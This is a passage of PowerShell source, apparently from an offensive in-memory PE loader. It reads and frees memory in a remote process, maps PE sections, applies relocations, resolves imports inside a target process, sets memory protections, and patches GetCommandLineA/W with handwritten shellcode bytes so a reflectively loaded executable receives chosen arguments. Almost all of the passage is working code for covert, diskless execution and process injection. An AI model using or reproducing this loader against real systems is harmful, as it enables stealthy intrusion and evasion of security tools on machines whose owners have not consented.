memory\n\t\t[IntPtr]$ReturnValMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize)\n\t\t$Result = $Win32Functions.ReadProcessMemory.Invoke($RemoteProcHandle, $GetProcAddressRetMem, $ReturnValMem, [UIntPtr][UInt64]$PtrSize, [Ref]$NumBytesWritten)\n\t\tif (($Result -eq $false) -or ($NumBytesWritten -eq 0))\n\t\t{\n\t\t\tThrow \"Call to ReadProcessMemory failed\"\n\t\t}\n\t\t[IntPtr]$ProcAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr])\n\n\t\t$Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null\n\t\t$Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RFuncNamePtr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null\n\t\t$Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $GetProcAddressRetMem, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null\n\t\t\n\t\treturn $ProcAddress\n\t}\n\n\n\tFunction Copy-Sections\n\t{\n\t\tParam(\n\t\t[Parameter(Position = 0, Mandatory = $true)]\n\t\t[Byte[]]\n\t\t$PEBytes,\n\t\t\n\t\t[Parameter(Position = 1, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$PEInfo,\n\t\t\n\t\t[Parameter(Position = 2, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Functions,\n\t\t\n\t\t[Parameter(Position = 3, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Types\n\t\t)\n\t\t\n\t\tfor( $i = 0; $i -lt $PEInfo.IMAGE_NT_HEADERS.FileHeader.NumberOfSections; $i++)\n\t\t{\n\t\t\t[IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.SectionHeaderPtr) ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_SECTION_HEADER)))\n\t\t\t$SectionHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($SectionHeaderPtr, [Type]$Win32Types.IMAGE_SECTION_HEADER)\n\t\t\n\t\t\t#Address to copy the section to\n\t\t\t[IntPtr]$SectionDestAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$SectionHeader.VirtualAddress))\n\t\t\t\n\t\t\t#SizeOfRawData is the size of the data on disk, VirtualSize is the minimum space that can be allocated\n\t\t\t#    in memory for the section. If VirtualSize > SizeOfRawData, pad the extra spaces with 0. If\n\t\t\t#    SizeOfRawData > VirtualSize, it is because the section stored on disk has padding that we can throw away,\n\t\t\t#    so truncate SizeOfRawData to VirtualSize\n\t\t\t$SizeOfRawData = $SectionHeader.SizeOfRawData\n\n\t\t\tif ($SectionHeader.PointerToRawData -eq 0)\n\t\t\t{\n\t\t\t\t$SizeOfRawData = 0\n\t\t\t}\n\t\t\t\n\t\t\tif ($SizeOfRawData -gt $SectionHeader.VirtualSize)\n\t\t\t{\n\t\t\t\t$SizeOfRawData = $SectionHeader.VirtualSize\n\t\t\t}\n\t\t\t\n\t\t\tif ($SizeOfRawData -gt 0)\n\t\t\t{\n\t\t\t\tTest-MemoryRangeValid -DebugString \"Copy-Sections::MarshalCopy\" -PEInfo $PEInfo -StartAddress $SectionDestAddr -Size $SizeOfRawData | Out-Null\n\t\t\t\t[System.Runtime.InteropServices.Marshal]::Copy($PEBytes, [Int32]$SectionHeader.PointerToRawData, $SectionDestAddr, $SizeOfRawData)\n\t\t\t}\n\t\t\n\t\t\t#If SizeOfRawData is less than VirtualSize, set memory to 0 for the extra space\n\t\t\tif ($SectionHeader.SizeOfRawData -lt $SectionHeader.VirtualSize)\n\t\t\t{\n\t\t\t\t$Difference = $SectionHeader.VirtualSize - $SizeOfRawData\n\t\t\t\t[IntPtr]$StartAddress = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$SectionDestAddr) ([Int64]$SizeOfRawData))\n\t\t\t\tTest-MemoryRangeValid -DebugString \"Copy-Sections::Memset\" -PEInfo $PEInfo -StartAddress $StartAddress -Size $Difference | Out-Null\n\t\t\t\t$Win32Functions.memset.Invoke($StartAddress, 0, [IntPtr]$Difference) | Out-Null\n\t\t\t}\n\t\t}\n\t}\n\n\n\tFunction Update-MemoryAddresses\n\t{\n\t\tParam(\n\t\t[Parameter(Position = 0, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$PEInfo,\n\t\t\n\t\t[Parameter(Position = 1, Mandatory = $true)]\n\t\t[Int64]\n\t\t$OriginalImageBase,\n\t\t\n\t\t[Parameter(Position = 2, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Constants,\n\t\t\n\t\t[Parameter(Position = 3, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Types\n\t\t)\n\t\t\n\t\t[Int64]$BaseDifference = 0\n\t\t$AddDifference = $true #Track if the difference variable should be added or subtracted from variables\n\t\t[UInt32]$ImageBaseRelocSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_BASE_RELOCATION)\n\t\t\n\t\t#If the PE was loaded to its expected address or there are no entries in the BaseRelocationTable, nothing to do\n\t\tif (($OriginalImageBase -eq [Int64]$PEInfo.EffectivePEHandle) `\n\t\t\t\t-or ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.BaseRelocationTable.Size -eq 0))\n\t\t{\n\t\t\treturn\n\t\t}\n\n\n\t\telseif ((Compare-Val1GreaterThanVal2AsUInt ($OriginalImageBase) ($PEInfo.EffectivePEHandle)) -eq $true)\n\t\t{\n\t\t\t$BaseDifference = Sub-SignedIntAsUnsigned ($OriginalImageBase) ($PEInfo.EffectivePEHandle)\n\t\t\t$AddDifference = $false\n\t\t}\n\t\telseif ((Compare-Val1GreaterThanVal2AsUInt ($PEInfo.EffectivePEHandle) ($OriginalImageBase)) -eq $true)\n\t\t{\n\t\t\t$BaseDifference = Sub-SignedIntAsUnsigned ($PEInfo.EffectivePEHandle) ($OriginalImageBase)\n\t\t}\n\t\t\n\t\t#Use the IMAGE_BASE_RELOCATION structure to find memory addresses which need to be modified\n\t\t[IntPtr]$BaseRelocPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.BaseRelocationTable.VirtualAddress))\n\t\twhile($true)\n\t\t{\n\t\t\t#If SizeOfBlock == 0, we are done\n\t\t\t$BaseRelocationTable = [System.Runtime.InteropServices.Marshal]::PtrToStructure($BaseRelocPtr, [Type]$Win32Types.IMAGE_BASE_RELOCATION)\n\n\t\t\tif ($BaseRelocationTable.SizeOfBlock -eq 0)\n\t\t\t{\n\t\t\t\tbreak\n\t\t\t}\n\n\t\t\t[IntPtr]$MemAddrBase = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$BaseRelocationTable.VirtualAddress))\n\t\t\t$NumRelocations = ($BaseRelocationTable.SizeOfBlock - $ImageBaseRelocSize) / 2\n\n\t\t\t#Loop through each relocation\n\t\t\tfor($i = 0; $i -lt $NumRelocations; $i++)\n\t\t\t{\n\t\t\t\t#Get info for this relocation\n\t\t\t\t$RelocationInfoPtr = [IntPtr](Add-SignedIntAsUnsigned ([IntPtr]$BaseRelocPtr) ([Int64]$ImageBaseRelocSize + (2 * $i)))\n\t\t\t\t[UInt16]$RelocationInfo = [System.Runtime.InteropServices.Marshal]::PtrToStructure($RelocationInfoPtr, [Type][UInt16])\n\n\t\t\t\t#First 4 bits is the relocation type, last 12 bits is the address offset from $MemAddrBase\n\t\t\t\t[UInt16]$RelocOffset = $RelocationInfo -band 0x0FFF\n\t\t\t\t[UInt16]$RelocType = $RelocationInfo -band 0xF000\n\t\t\t\tfor ($j = 0; $j -lt 12; $j++)\n\t\t\t\t{\n\t\t\t\t\t$RelocType = [Math]::Floor($RelocType / 2)\n\t\t\t\t}\n\n\t\t\t\t#For DLL's there are two types of relocations used according to the following MSDN article. One for 64bit and one for 32bit.\n\t\t\t\t#This appears to be true for EXE's as well.\n\t\t\t\t#\tSite: http://msdn.microsoft.com/en-us/magazine/cc301808.aspx\n\t\t\t\tif (($RelocType -eq $Win32Constants.IMAGE_REL_BASED_HIGHLOW) `\n\t\t\t\t\t\t-or ($RelocType -eq $Win32Constants.IMAGE_REL_BASED_DIR64))\n\t\t\t\t{\t\t\t\n\t\t\t\t\t#Get the current memory address and update it based off the difference between PE expected base address and actual base address\n\t\t\t\t\t[IntPtr]$FinalAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$MemAddrBase) ([Int64]$RelocOffset))\n\t\t\t\t\t[IntPtr]$CurrAddr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($FinalAddr, [Type][IntPtr])\n\t\t\n\t\t\t\t\tif ($AddDifference -eq $true)\n\t\t\t\t\t{\n\t\t\t\t\t\t[IntPtr]$CurrAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$CurrAddr) ($BaseDifference))\n\t\t\t\t\t}\n\t\t\t\t\telse\n\t\t\t\t\t{\n\t\t\t\t\t\t[IntPtr]$CurrAddr = [IntPtr](Sub-SignedIntAsUnsigned ([Int64]$CurrAddr) ($BaseDifference))\n\t\t\t\t\t}\t\t\t\t\n\n\t\t\t\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($CurrAddr, $FinalAddr, $false) | Out-Null\n\t\t\t\t}\n\t\t\t\telseif ($RelocType -ne $Win32Constants.IMAGE_REL_BASED_ABSOLUTE)\n\t\t\t\t{\n\t\t\t\t\t#IMAGE_REL_BASED_ABSOLUTE is just used for padding, we don't actually do anything with it\n\t\t\t\t\tThrow \"Unknown relocation found, relocation value: $RelocType, relocationinfo: $RelocationInfo\"\n\t\t\t\t}\n\t\t\t}\n\t\t\t\n\t\t\t$BaseRelocPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$BaseRelocPtr) ([Int64]$BaseRelocationTable.SizeOfBlock))\n\t\t}\n\t}\n\n\n\tFunction Import-DllImports\n\t{\n\t\tParam(\n\t\t[Parameter(Position = 0, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$PEInfo,\n\t\t\n\t\t[Parameter(Position = 1, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Functions,\n\t\t\n\t\t[Parameter(Position = 2, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Types,\n\t\t\n\t\t[Parameter(Position = 3, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Constants,\n\t\t\n\t\t[Parameter(Position = 4, Mandatory = $false)]\n\t\t[IntPtr]\n\t\t$RemoteProcHandle\n\t\t)\n\t\t\n\t\t$RemoteLoading = $false\n\t\tif ($PEInfo.PEHandle -ne $PEInfo.EffectivePEHandle)\n\t\t{\n\t\t\t$RemoteLoading = $true\n\t\t}\n\t\t\n\t\tif ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.Size -gt 0)\n\t\t{\n\t\t\t[IntPtr]$ImportDescriptorPtr = Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.VirtualAddress)\n\t\t\t\n\t\t\twhile ($true)\n\t\t\t{\n\t\t\t\t$ImportDescriptor = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ImportDescriptorPtr, [Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR)\n\t\t\t\t\n\t\t\t\t#If the structure is null, it signals that this is the end of the array\n\t\t\t\tif ($ImportDescriptor.Characteristics -eq 0 `\n\t\t\t\t\t\t-and $ImportDescriptor.FirstThunk -eq 0 `\n\t\t\t\t\t\t-and $ImportDescriptor.ForwarderChain -eq 0 `\n\t\t\t\t\t\t-and $ImportDescriptor.Name -eq 0 `\n\t\t\t\t\t\t-and $ImportDescriptor.TimeDateStamp -eq 0)\n\t\t\t\t{\n\t\t\t\t\tWrite-Verbose \"Done importing DLL imports\"\n\t\t\t\t\tbreak\n\t\t\t\t}\n\n\t\t\t\t$ImportDllHandle = [IntPtr]::Zero\n\t\t\t\t$ImportDllPathPtr = (Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$ImportDescriptor.Name))\n\t\t\t\t$ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($ImportDllPathPtr)\n\t\t\t\t\n\t\t\t\tif ($RemoteLoading -eq $true)\n\t\t\t\t{\n\t\t\t\t\t$ImportDllHandle = Import-DllInRemoteProcess -RemoteProcHandle $RemoteProcHandle -ImportDllPathPtr $ImportDllPathPtr\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\t$ImportDllHandle = $Win32Functions.LoadLibrary.Invoke($ImportDllPath)\n\t\t\t\t}\n\n\t\t\t\tif (($ImportDllHandle -eq $null) -or ($ImportDllHandle -eq [IntPtr]::Zero))\n\t\t\t\t{\n\t\t\t\t\tthrow \"Error importing DLL, DLLName: $ImportDllPath\"\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\t#Get the first thunk, then loop through all of them\n\t\t\t\t[IntPtr]$ThunkRef = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($ImportDescriptor.FirstThunk)\n\t\t\t\t[IntPtr]$OriginalThunkRef = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($ImportDescriptor.Characteristics) #Characteristics is overloaded with OriginalFirstThunk\n\t\t\t\t[IntPtr]$OriginalThunkRefVal = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OriginalThunkRef, [Type][IntPtr])\n\t\t\t\t\n\t\t\t\twhile ($OriginalThunkRefVal -ne [IntPtr]::Zero)\n\t\t\t\t{\n\t\t\t\t\t$ProcedureName = ''\n\t\t\t\t\t#Compare thunkRefVal to IMAGE_ORDINAL_FLAG, which is defined as 0x80000000 or 0x8000000000000000 depending on 32bit or 64bit\n\t\t\t\t\t#\tIf the top bit is set on an int, it will be negative, so instead of worrying about casting this to uint\n\t\t\t\t\t#\tand doing the comparison, just see if it is less than 0\n\t\t\t\t\t[IntPtr]$NewThunkRef = [IntPtr]::Zero\n\t\t\t\t\tif([Int64]$OriginalThunkRefVal -lt 0)\n\t\t\t\t\t{\n\t\t\t\t\t\t$ProcedureName = [Int64]$OriginalThunkRefVal -band 0xffff #This is actually a lookup by ordinal\n\t\t\t\t\t}\n\t\t\t\t\telse\n\t\t\t\t\t{\n\t\t\t\t\t\t[IntPtr]$StringAddr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($OriginalThunkRefVal)\n\t\t\t\t\t\t$StringAddr = Add-SignedIntAsUnsigned $StringAddr ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt16]))\n\t\t\t\t\t\t$ProcedureName = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($StringAddr)\n\t\t\t\t\t}\n\t\t\t\t\t\n\t\t\t\t\tif ($RemoteLoading -eq $true)\n\t\t\t\t\t{\n\t\t\t\t\t\t[IntPtr]$NewThunkRef = Get-RemoteProcAddress -RemoteProcHandle $RemoteProcHandle -RemoteDllHandle $ImportDllHandle -FunctionName $ProcedureName\n\t\t\t\t\t}\n\t\t\t\t\telse\n\t\t\t\t\t{\n\t\t\t\t\t\tif($ProcedureName -is [string])\n\t\t\t\t\t\t{\n\t\t\t\t\t\t    [IntPtr]$NewThunkRef = $Win32Functions.GetProcAddress.Invoke($ImportDllHandle, $ProcedureName)\n\t\t\t\t\t\t}\n\t\t\t\t\t\telse\n\t\t\t\t\t\t{\n\t\t\t\t\t\t    [IntPtr]$NewThunkRef = $Win32Functions.GetProcAddressOrdinal.Invoke($ImportDllHandle, $ProcedureName)\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t\t\n\t\t\t\t\tif ($NewThunkRef -eq $null -or $NewThunkRef -eq [IntPtr]::Zero)\n\t\t\t\t\t{\n\t\t\t\t\t\tThrow \"New function reference is null, this is almost certainly a bug in this script. Function: $ProcedureName. Dll: $ImportDllPath\"\n\t\t\t\t\t}\n\n\t\t\t\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($NewThunkRef, $ThunkRef, $false)\n\t\t\t\t\t\n\t\t\t\t\t$ThunkRef = Add-SignedIntAsUnsigned ([Int64]$ThunkRef) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]))\n\t\t\t\t\t[IntPtr]$OriginalThunkRef = Add-SignedIntAsUnsigned ([Int64]$OriginalThunkRef) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]))\n\t\t\t\t\t[IntPtr]$OriginalThunkRefVal = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OriginalThunkRef, [Type][IntPtr])\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\t$ImportDescriptorPtr = Add-SignedIntAsUnsigned ($ImportDescriptorPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR))\n\t\t\t}\n\t\t}\n\t}\n\n\tFunction Get-VirtualProtectValue\n\t{\n\t\tParam(\n\t\t[Parameter(Position = 0, Mandatory = $true)]\n\t\t[UInt32]\n\t\t$SectionCharacteristics\n\t\t)\n\t\t\n\t\t$ProtectionFlag = 0x0\n\t\tif (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_EXECUTE) -gt 0)\n\t\t{\n\t\t\tif (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_READ) -gt 0)\n\t\t\t{\n\t\t\t\tif (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)\n\t\t\t\t{\n\t\t\t\t\t$ProtectionFlag = $Win32Constants.PAGE_EXECUTE_READWRITE\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\t$ProtectionFlag = $Win32Constants.PAGE_EXECUTE_READ\n\t\t\t\t}\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tif (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)\n\t\t\t\t{\n\t\t\t\t\t$ProtectionFlag = $Win32Constants.PAGE_EXECUTE_WRITECOPY\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\t$ProtectionFlag = $Win32Constants.PAGE_EXECUTE\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\telse\n\t\t{\n\t\t\tif (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_READ) -gt 0)\n\t\t\t{\n\t\t\t\tif (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)\n\t\t\t\t{\n\t\t\t\t\t$ProtectionFlag = $Win32Constants.PAGE_READWRITE\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\t$ProtectionFlag = $Win32Constants.PAGE_READONLY\n\t\t\t\t}\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tif (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)\n\t\t\t\t{\n\t\t\t\t\t$ProtectionFlag = $Win32Constants.PAGE_WRITECOPY\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\t$ProtectionFlag = $Win32Constants.PAGE_NOACCESS\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\t\n\t\tif (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_NOT_CACHED) -gt 0)\n\t\t{\n\t\t\t$ProtectionFlag = $ProtectionFlag -bor $Win32Constants.PAGE_NOCACHE\n\t\t}\n\t\t\n\t\treturn $ProtectionFlag\n\t}\n\n\tFunction Update-MemoryProtectionFlags\n\t{\n\t\tParam(\n\t\t[Parameter(Position = 0, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$PEInfo,\n\t\t\n\t\t[Parameter(Position = 1, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Functions,\n\t\t\n\t\t[Parameter(Position = 2, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Constants,\n\t\t\n\t\t[Parameter(Position = 3, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Types\n\t\t)\n\t\t\n\t\tfor( $i = 0; $i -lt $PEInfo.IMAGE_NT_HEADERS.FileHeader.NumberOfSections; $i++)\n\t\t{\n\t\t\t[IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.SectionHeaderPtr) ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_SECTION_HEADER)))\n\t\t\t$SectionHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($SectionHeaderPtr, [Type]$Win32Types.IMAGE_SECTION_HEADER)\n\t\t\t[IntPtr]$SectionPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($SectionHeader.VirtualAddress)\n\t\t\t\n\t\t\t[UInt32]$ProtectFlag = Get-VirtualProtectValue $SectionHeader.Characteristics\n\t\t\t[UInt32]$SectionSize = $SectionHeader.VirtualSize\n\t\t\t\n\t\t\t[UInt32]$OldProtectFlag = 0\n\t\t\tTest-MemoryRangeValid -DebugString \"Update-MemoryProtectionFlags::VirtualProtect\" -PEInfo $PEInfo -StartAddress $SectionPtr -Size $SectionSize | Out-Null\n\t\t\t$Success = $Win32Functions.VirtualProtect.Invoke($SectionPtr, $SectionSize, $ProtectFlag, [Ref]$OldProtectFlag)\n\t\t\tif ($Success -eq $false)\n\t\t\t{\n\t\t\t\tThrow \"Unable to change memory protection\"\n\t\t\t}\n\t\t}\n\t}\n\t\n\t#This function overwrites GetCommandLine and ExitThread which are needed to reflectively load an EXE\n\t#Returns an object with addresses to copies of the bytes that were overwritten (and the count)\n\tFunction Update-ExeFunctions\n\t{\n\t\tParam(\n\t\t[Parameter(Position = 0, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$PEInfo,\n\t\t\n\t\t[Parameter(Position = 1, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Functions,\n\t\t\n\t\t[Parameter(Position = 2, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Constants,\n\t\t\n\t\t[Parameter(Position = 3, Mandatory = $true)]\n\t\t[String]\n\t\t$ExeArguments,\n\t\t\n\t\t[Parameter(Position = 4, Mandatory = $true)]\n\t\t[IntPtr]\n\t\t$ExeDoneBytePtr\n\t\t)\n\t\t\n\t\t#This will be an array of arrays. The inner array will consist of: @($DestAddr, $SourceAddr, $ByteCount). This is used to return memory to its original state.\n\t\t$ReturnArray = @() \n\t\t\n\t\t$PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])\n\t\t[UInt32]$OldProtectFlag = 0\n\t\t\n\t\t[IntPtr]$Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke(\"Kernel32.dll\")\n\t\tif ($Kernel32Handle -eq [IntPtr]::Zero)\n\t\t{\n\t\t\tthrow \"Kernel32 handle null\"\n\t\t}\n\t\t\n\t\t[IntPtr]$KernelBaseHandle = $Win32Functions.GetModuleHandle.Invoke(\"KernelBase.dll\")\n\t\tif ($KernelBaseHandle -eq [IntPtr]::Zero)\n\t\t{\n\t\t\tthrow \"KernelBase handle null\"\n\t\t}\n\n\t\t#################################################\n\t\t#First overwrite the GetCommandLine() function. This is the function that is called by a new process to get the command line args used to start it.\n\t\t#\tWe overwrite it with shellcode to return a pointer to the string ExeArguments, allowing us to pass the exe any args we want.\n\t\t$CmdLineWArgsPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($ExeArguments)\n\t\t$CmdLineAArgsPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($ExeArguments)\n\t\n\t\t[IntPtr]$GetCommandLineAAddr = $Win32Functions.GetProcAddress.Invoke($KernelBaseHandle, \"GetCommandLineA\")\n\t\t[IntPtr]$GetCommandLineWAddr = $Win32Functions.GetProcAddress.Invoke($KernelBaseHandle, \"GetCommandLineW\")\n\n\t\tif ($GetCommandLineAAddr -eq [IntPtr]::Zero -or $GetCommandLineWAddr -eq [IntPtr]::Zero)\n\t\t{\n\t\t\tthrow \"GetCommandLine ptr null. GetCommandLineA: $GetCommandLineAAddr. GetCommandLineW: $GetCommandLineWAddr\"\n\t\t}\n\n\t\t#Prepare the shellcode\n\t\t[Byte[]]$Shellcode1 = @()\n\t\tif ($PtrSize -eq 8)\n\t\t{\n\t\t\t$Shellcode1 += 0x48\t#64bit shellcode has the 0x48 before the 0xb8\n\t\t}\n\t\t$Shellcode1 += 0xb8\n\t\t\n\t\t[Byte[]]$Shellcode2 = @(0xc3)\n\t\t$TotalSize = $Shellcode1.Length + $PtrSize + $Shellcode2.Length\n\t\t\n\t\t\n\t\t#Make copy of GetCommandLineA and GetCommandLineW\n\t\t$GetCommandLineAOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize)\n\t\t$GetCommandLineWOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize)\n\t\t$Win32Functions.memcpy.Invoke($GetCommandLineAOrigBytesPtr, $GetCommandLineAAddr, [UInt64]$TotalSize) | Out-Null\n\t\t$Win32Functions.memcpy.Invoke($GetCommandLineWOrigBytesPtr, $GetCommandLineWAddr, [UInt64]$TotalSize) | Out-Null\n\t\t$ReturnArray += ,($GetCommandLineAAddr, $GetCommandLineAOrigBytesPtr, $TotalSize)\n\t\t$ReturnArray += ,($GetCommandLineWAddr, $GetCommandLineWOrigBytesPtr, $TotalSize)\n\n\t\t#Overwrite GetCommandLineA\n\t\t[UInt32]$OldProtectFlag = 0\n\t\t$Success = $Win32Functions.VirtualProtect.Invoke($GetCommandLineAAddr, [UInt32]$TotalSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag)\n\t\tif ($Success = $false)\n\t\t{\n\t\t\tthrow \"Call to VirtualProtect failed\"\n\t\t}\n\t\t\n\t\t$GetCommandLineAAddrTemp = $GetCommandLineAAddr\n\t\tWrite-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineAAddrTemp\n\t\t$GetCommandLineAAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineAAddrTemp ($Shellcode1.Length)\n\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($CmdLineAArgsPtr, $GetCommandLineAAddrTemp, $false)\n\t\t$GetCommandLineAAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineAAddrTemp $PtrSize\n\t\tWrite-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $GetCommandLineAAddrTemp\n\t\t\n\t\t$Win32Functions.VirtualProtect.Invoke($GetCommandLineAAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null\n\t\t\n\t\t\n\t\t#Overwrite GetCommandLineW\n\t\t[UInt32]$OldProtectFlag = 0\n\t\t$Success = $Win32Functions.VirtualProtect.Invoke($GetCommandLineWAddr, [UInt32]$TotalSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag)\n\t\tif ($Success = $false)\n\t\t{\n\t\t\tthrow \"Call to VirtualProtect failed\"\n\t\t}\n\t\t\n\t\t$GetCommandLineWAddrTemp = $GetCommandLineWAddr\n\t\tWrite-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineWAddrTemp\n\t\t$GetCommandLineWAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineWAddrTemp ($Shellcode1.Length)\n\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($CmdLineWArgsPtr, $GetCommandLineWAddrTemp, $false)\n\t\t$GetCommandLineWAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineWAddrTemp $PtrSize\n\t\tWrite-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $GetCommandLineWAddrTemp\n\t\t\n\t\t$Win32Functions.VirtualProtect.Invoke($GetCommandLineWAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null\n\t\t#################################################\n\t\t\n\t\t\n\t\t#################################################\n\t\t#For C++ stuff that is compiled with visual studio as \"multithreaded DLL\", the above method of overwriting GetCommandLine doesn't work.\n\t\t#\tI don't know why exactly.. But the msvcr DLL that a \"DLL compiled executable\" imports has an export called _acmdln and _wcmdln.\n\t\t#\tIt appears to call GetCommandLine and store the result in this var. Then when you call __wgetcmdln it parses and returns the\n\t\t#\targv and argc values stored in these variables. So the easy thing to do is just overwrite the variable since they are exported.\n\t\t$DllList = @(\"msvcr70d.dll\", \"msvcr71d.dll\", \"msvcr80d.dll\", \"msvcr90d.dll\", \"msvcr100d.dll\", \"msvcr110d.dll\", \"msvcr70.dll\" `\n\t\t\t, \"msvcr71.dll\", \"msvcr80.dll\", \"msvcr90.dll\", \"msvcr100.dll\", \"msvcr110.dll\")\n\t\t\n\t\tforeach ($Dll in $DllList)\n\t\t{\n\t\t\t[IntPtr]$DllHandle = $Win32Functions.GetModuleHandle.Invoke($Dll)\n\t\t\tif ($DllHandle -ne [IntPtr]::Zero)\n\t\t\t{\n\t\t\t\t[IntPtr]$WCmdLnAddr = $Win32Functions.GetProcAddress.Invoke($DllHandle, \"_wcmdln\")\n\t\t\t\t[IntPtr]$ACmdLnAddr = $Win32Functions.GetProcAddress.Invoke($DllHandle, \"_acmdln\")\n\t\t\t\tif 